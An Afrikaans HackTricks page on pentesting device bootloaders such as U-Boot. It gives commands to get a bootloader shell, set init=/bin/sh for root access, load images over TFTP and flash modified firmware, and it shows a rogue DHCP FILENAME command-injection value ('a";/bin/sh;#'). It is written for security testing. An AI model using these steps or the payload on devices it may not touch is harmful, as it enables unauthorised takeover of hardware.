hacktricks/physical-attacks/firmware-analysis/bootloader-testing.md
2024-02-11 02:07:06 +00:00

4.6 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Die volgende stappe word aanbeveel vir die wysiging van toestelopstartkonfigurasies en opstartlaaiers soos U-boot:

  1. Kry toegang tot die opstartlaaier se tolkshell:
  • Druk tydens opstart "0", spasie, of ander geïdentifiseerde "sielkodes" om toegang tot die opstartlaaier se tolkshell te verkry.
  1. Wysig opstartargumente:
  • Voer die volgende opdragte uit om 'init=/bin/sh' by die opstartargumente te voeg, wat die uitvoering van 'n skelopdrag moontlik maak: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
  1. Stel 'n TFTP-bediener op:
  • Stel 'n TFTP-bediener op om beelde oor 'n plaaslike netwerk te laai: %%% #setenv ipaddr 192.168.2.2 #plaaslike IP van die toestel #setenv serverip 192.168.2.1 #TFTP-bediener IP #saveenv #reset #ping 192.168.2.1 #kontroleer netwerktoegang #tftp ${loadaddr} uImage-3.6.35 #loadaddr neem die adres om die lêer in te laai en die lêernaam van die beeld op die TFTP-bediener %%%
  1. Maak gebruik van ubootwrite.py:
  • Gebruik ubootwrite.py om die U-boot-beeld te skryf en 'n gewysigde firmware te stuur om root-toegang te verkry.
  1. Kontroleer foutopsporingsfunksies:
  • Verifieer of foutopsporingsfunksies soos oordrewe logboekinskrywings, die laai van willekeurige kerns, of die opstart vanaf onbetroubare bronne geaktiveer is.
  1. Versigtige hardeware-inmenging:
  • Wees versigtig wanneer jy een pen aan die grond verbind en interaksie hê met SPI- of NAND-flitskypleiers tydens die toestel se opstartvolgorde, veral voordat die kernel ontspan. Raadpleeg die NAND-flitskypleier se datablad voordat jy pennaaldjies kortsluit.
  1. Stel 'n skelm DHCP-bediener op:
  • Stel 'n skelm DHCP-bediener op met skadelike parameters vir 'n toestel om tydens 'n PXE-opstart in te neem. Maak gebruik van hulpmiddels soos Metasploit se (MSF) DHCP-hulpbediener. Wysig die 'FILENAME'-parameter met opdraginskrywings soos 'a";/bin/sh;#' om insetvalidering vir toestelopstartprosedures te toets.

Opmerking: Die stappe wat fisieke interaksie met toestelpenne behels (*gemerk met asterisk) moet met uiterste versigtigheid benader word om skade aan die toestel te voorkom.

Verwysings

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: